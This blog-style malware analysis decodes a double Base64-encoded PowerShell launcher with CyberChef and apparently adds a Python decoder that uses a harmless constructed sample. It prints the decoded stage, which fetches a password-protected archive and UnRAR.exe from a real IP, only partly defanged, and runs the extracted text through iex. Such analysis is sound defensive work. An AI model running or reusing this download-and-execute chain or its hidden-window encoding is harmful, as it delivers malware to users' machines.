Analysis Double Encoded Malicious Powershell

In this article we analyze a PowerShell script that has been encoded several times. Layered encoding of this kind is used to slip past detection tools and to make analysis harder, especially for analysts who are new to malware analysis.

Sample SHA-256 : 59c4ed935aeac36675c202a0f5b56d0f895d2417ea201d53d2f25f291f13f76c


Code Analysis :

1- powershell -w H -eC : The first line of the malicious code is the PowerShell launcher. -w is the abbreviated -WindowStyle switch, H is its value Hidden, and -eC is the abbreviated -EncodedCommand switch, which takes a Base64 string as the command to run. So -w H tells PowerShell to run the script without showing any window (completely hidden from the user), and -eC tells it that the command that follows is encoded.



Code Decoding Process :

1- Open CyberChef
2- Paste the encoded code in the left-hand (Input) pane.
3- Select From Base64 in Operations.


4- Then, again in Operations, select Remove null bytes. The null bytes are there because -EncodedCommand expects the command as UTF-16LE text, so every ASCII character is followed by a 0x00 byte; stripping them gives readable text.


As the image shows, the output is another Base64-encoded blob. At first glance it looks like the same code we got from the original file, but it is completely different. Let's copy the encoded code and apply the same operations again.

1- Open CyberChef
2- Paste the encoded code in the left-hand (Input) pane.
3- Select From Base64 in Operations.
4- Then, again in Operations, select Remove null bytes.

This time yet another encoded command appears (image below), and it is a different PowerShell command: the powershell -w H -eC launcher is the same, but the encoded code is different.

Decoding Process :

1- Open CyberChef
2- Paste the encoded code in the left-hand (Input) pane.
3- Select From Base64 in Operations.
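The CyberChef steps above (From Base64, then Remove null bytes, repeated for each layer) can be scripted so that every layer is peeled in one pass. This is an added example, not code from the original article; the launcher strings it decodes are constructed inline (a harmless Write-Host command wrapped twice), and the names ENC_RE, decode_layer, peel and encode_layer are the example's own.

```python
import base64
import binascii
import re
from typing import List, Optional

# Matches the -EncodedCommand switch in any abbreviation PowerShell accepts
# (-e, -ec, -enc, -EncodedCommand ...) followed by a Base64 blob.
ENC_RE = re.compile(r"-e[ncodema]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_layer(cmdline: str) -> Optional[str]:
    """Return the command hidden behind -eC, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    # -EncodedCommand payloads are UTF-16LE: the null bytes the article removes
    # with CyberChef are the high byte of each UTF-16 code unit, so decoding as
    # UTF-16LE is the same thing as "From Base64" + "Remove null bytes".
    return raw.decode("utf-16-le", errors="replace")


def peel(cmdline: str, max_layers: int = 10) -> List[str]:
    """Decode nested -eC launchers; returns every layer, outermost first."""
    layers = [cmdline]
    while len(layers) <= max_layers:
        inner = decode_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def encode_layer(script: str) -> str:
    """Wrap a script the way the sample does (used only to build the fixture)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -w H -eC {b64}"


# Constructed double-encoded sample standing in for the real launcher.
FINAL_STAGE = 'Write-Host "final stage"'
SAMPLE = encode_layer(encode_layer(FINAL_STAGE))

if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE)):
        print(f"layer {depth}: {layer[:80]}")
```

Each printed layer corresponds to one round of the CyberChef recipe; the last one is the plain-text command that would finally run.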



Fully Decoded Malicious Powershell Code (URLs defanged with brackets):

Invoke-WebRequest -Uri "http://[95.]164.55.39/main/glh/[yhgdv8.rar]" -OutFile "$env:TEMP\yhgdv8.rar";
iwr -Uri "http://95.164.55.39/[UnRAR.exe]" -OutFile "$env:TEMP\[UnRAR.exe]";
Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP";
Start-Sleep -Seconds 4;
Get-Content "$env:TEMP\yhgdv8.txt" | iex;

Decoded Malicious Powershell code analysis :

1- The malware downloads a RAR archive from the attacker's server and saves it to %TEMP%: Invoke-WebRequest -Uri "http://[95.]164.55.39/main/glh/[yhgdv8.rar]" -OutFile "$env:TEMP\yhgdv8.rar";

2- It then downloads its own copy of UnRAR.exe into %TEMP% (iwr is the alias of Invoke-WebRequest): iwr -Uri "http://95.164.55.39/[UnRAR.exe]" -OutFile "$env:TEMP\[UnRAR.exe]";

3- It runs that UnRAR.exe without a new window to extract the password-protected archive (password passed with -p, overwrite with -o+) into %TEMP%, which contains the next stage: Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP";

4- After a 4-second pause to let extraction finish, it reads the extracted file yhgdv8.txt and pipes it to iex (Invoke-Expression), executing the next stage from yhgdv8.rar in memory: Start-Sleep -Seconds 4; Get-Content "$env:TEMP\yhgdv8.txt" | iex;
